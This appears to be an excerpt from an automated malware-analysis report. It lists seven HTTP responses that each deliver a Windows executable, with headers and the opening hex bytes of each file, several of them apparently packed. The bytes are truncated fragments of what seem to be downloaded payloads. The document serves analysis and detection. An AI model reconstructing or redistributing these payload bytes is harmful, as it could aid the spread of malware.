                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:29 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Sun, 22 Sep 2024 20:59:29 GMTConnection: keep-aliveETag: "66f08531-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:32 GMTContent-Type: application/octet-streamContent-Length: 986112Last-Modified: Tue, 24 Sep 2024 18:05:31 GMTConnection: keep-aliveETag: "66f2ff6b-f0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 27 31 f2 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 02 0f 00 00 08 00 00 00 00 00 00 82 21 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 21 0f 00 57 00 00 00 00 40 0f 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 01 0f 00 00 20 00 00 00 02 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 05 00 00 00 40 0f 00 00 06 00 00 00 04 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0f 00 00 02 00 00 00 0a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 21 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 50 d9 0e 00 d8 47 00 00 03 00 00 00 e7 00 00 06 94 55 00 00 bc 83 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 28 d4 00 00 06 2a 00 00 00 3e 03 02 28 18 00 00 0a 04 6f 56 00 00 06 26 2a 2e 73 0c 00 00 06 80 01 00 00 04 2a 1b 30 04 00 88 01 00 00 01 00 00 11 28 19 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 33 07 28 07 00 00 06 2d 03 16 6a 2a 7e 01 00 00 04 25 13 0b 28 1c 00 00 0a 7e 01 00 00 04 6f 0d 00 00 06 0c 08 16 6a 40 38 01 00 00 28 1d 00 00 0a 13 08 73 1e 00 00 0a 0b 11 08 6f 1f 00 00 0a 13 07 de 11 26 11 08 6f 20 00 00 0a 73 21 00 00 0a 13 07 de 00 11 07 6f 22 00 00 0a 0d 09 2c 07 09 8e 69 2d 02 14 0d 09 2c 07 07 09 6f 23 00 00 0a 07 28 24 00 00 0a 11 07 6f 25 00 00 0a 6f 26 00 00 0a 6f 23 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 28 09 00 00 06 13 05 28 19 00 00 06 13 06 07 11 05 1e 63 d2 6f 27 00 00 0a 07 11 06 d2 6f 27 00 00 0a 07 11 05 1f 18 63 d2 6f 27 00 00 0a 07 11 06 1e 63 d2 6f 27 00 00 0a 07 11 05 d2 6f 27 00 00 0a 07 11 06 1f 18 63 d2 6f 27 00 00 0a 07 11 05 1f 10 63 d2 6f 27 00 00 0a 07 11 06 1f 10 63 d2 6f 2
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:34 GMTContent-Type: application/octet-streamContent-Length: 367616Last-Modified: Wed, 25 Sep 2024 17:02:23 GMTConnection: keep-aliveETag: "66f4421f-59c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b1 ea f3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 92 05 00 00 08 00 00 00 00 00 00 3e b1 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 b0 05 00 53 00 00 00 00 c0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 b0 af 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 91 05 00 00 20 00 00 00 92 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 05 00 00 06 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 9a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 b1 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 9e 05 00 e8 10 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 84 c5 64 0e 83 9a 4b be 0c f9 53 6b 0c ce 2b 47 ae 7f bf ee 51 8c ae fa 11 9d 1d 88 f7 af 95 1b ca 86 4a 19 6e 6a a4 49 d5 6b ad cb 29 f0 cd 45 26 45 89 38 5f de 62 b0 a3 de 24 10 17 b4 8c ff 09 ec d9 ee df 28 23 3f 6f 38 d0 0a c1 b5 0f 62 9d 39 b0 01 06 e9 7e 56 b5 34 83 99 76 31 d7 75 54 e1 30 da 86 1c 16 1d 5e 2e a0 d3 4c 62 81 a6 cb 0c 87 a8 c0 f8 3b d5 83 8f 0e 35 05 48 19 02 5e 84 31 8f 7c 3c c5 96 a5 60 79 35 34 a7 12 f2 66 e5 7e 0e ef 59 2c cc 53 2c 11 d1 57 70 f2 53 5b 36 83 86 dd 9c 9b 4e 6b fc 45 1e 08 5e d9 12 10 69 26 f8 a3 a4 bf fe 8d f7 10 3f 6f 6e 04 0a 8a 9f 7e 21 10 36 41 bb 01 d2 41 0e c5 96 ef 1d 4a 94 e4 8e 6e db d0 b3 78 0e 54 12 48 ea 61 92 d0 f0 9e b1 c9 ea d2 7a cc 17 08 63 d3 57 d3 85 1b 90 6e a2 67 23 75 a1 3e a3 41 91 da e7 84 36 4b 99 71 63 52 df 39 84 4c 89 da 3b 11 7a d2 73 3c eb ba df a1 92 6a f4 7c 1d 0e 9a 8c 92 0a bd 49 3a b2 77 e0 17 48 24 ed cc f3 90 7a 0f 5d 4d 48 8d 03 43 68 44 8f 79 d2 99 3e e
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:37 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 01:43:45 GMTETag: "1be200-6230ffc554407"Accept-Ranges: bytesContent-Length: 1827328Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 60 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 76 d4 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 69 69 6b 62 78 7a 67 00 80 19 00 00 d0 4f 00 00 7e 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6e 79 6e 68 6d 68 6b 00 10 00 00 00 50 69 00 00 06 00 00 00 ba 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 69 00 00 22 00 00 00 c0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:42 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 02:17:24 GMTETag: "1d7200-6231074af51cc"Accept-Ranges: bytesContent-Length: 1929728Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 a0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4c 00 00 04 00 00 1c 60 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 85 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 85 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 77 7a 6f 75 6b 7a 68 00 60 1a 00 00 30 32 00 00 58 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 61 68 7a 73 67 75 64 00 10 00 00 00 90 4c 00 00 04 00 00 00 4c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4c 00 00 22 00 00 00 50 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:45 GMTContent-Type: application/octet-streamContent-Length: 3643904Last-Modified: Thu, 26 Sep 2024 19:28:15 GMTConnection: keep-aliveETag: "66f5b5cf-379a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 80 02 85 16 00 00 00 00 00 00 00 00 f0 00 02 01 0b 02 08 00 00 5c 23 00 00 3c 14 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 37 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 23 00 ac 3a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 5b 23 00 00 20 00 00 00 5c 23 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 3a 14 00 00 80 23 00 00 3c 14 00 00 5e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 58 e5 22 00 54 96 00 00 00 00 02 00 4e 00 00 06 a4 b7 00 00 b2 2d 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 7e 19 bc 80 fc 50 74 80 66 ad 9d 4c 5e 5b 31 e4 77 a8 75 91 fd a0 ce d2 95 17 42 5a c5 46 14 82 e4 aa 21 9b ea df fa 2d 0e 28 9b 04 83 45 11 e2 21 6c 04 7c c1 49 c9 dd 49 e8 ea e5 0d 19 b9 1f 98 1b 66 b2 39 94 f9 96 ac 48 83 d4 04 ca 4f 4f 05 5f 39 58 42 96 c0 9b e0 43 52 01 f4 15 1f f3 6e 7c 6b 68 de 5e a9 8b 72 6c cf 79 c5 f3 d8 7e 99 9a df ad df 60 db 02 5a ca d0 f4 42 f8 a0 97 28 8e 65 87 5f e6 70 a6 b4 ac e5 d4 c6 46 d5 eb 6a d3 67 5a 34 70 13 0e 9f 68 0d 14 8c b3 48 79 ca 37 50 36 8d 51 1e b1 29 39 f7 32 79 07 3a 13 f3 e4 8a 6e 90 46 62 b7 7a 57 e6 f5 d8 5c 19 01 63 6c 09 8e f5 9e 5d 18 b4 b4 31 f9 77 e0 93 98 2d f9 1f a7 28 d9 e7 84 d4 97 ba 36 69 28 d7 cb 20 f6 ce 0d fc ab 1d 55 86 72 b9 db 14 67 40 99 c2 4e c7 de 3d 71 d8 89 83 83 b8 5d e2 27 ad 8b db 64 d9 80 12 86 9a 81 db c8 20 b5 1f 0b 70 6c 57 21 72 1b 5f f8 8e ad 1d 44 88 78 f1 be 71 5f c3 2d fe af 8d bf 87 3c b2 46 03 73 51 23 69 78 13 4c 06 c1 b3 92 2b e2 d5 2c 62 cc fd 22 8e 1c 57 c0 f1
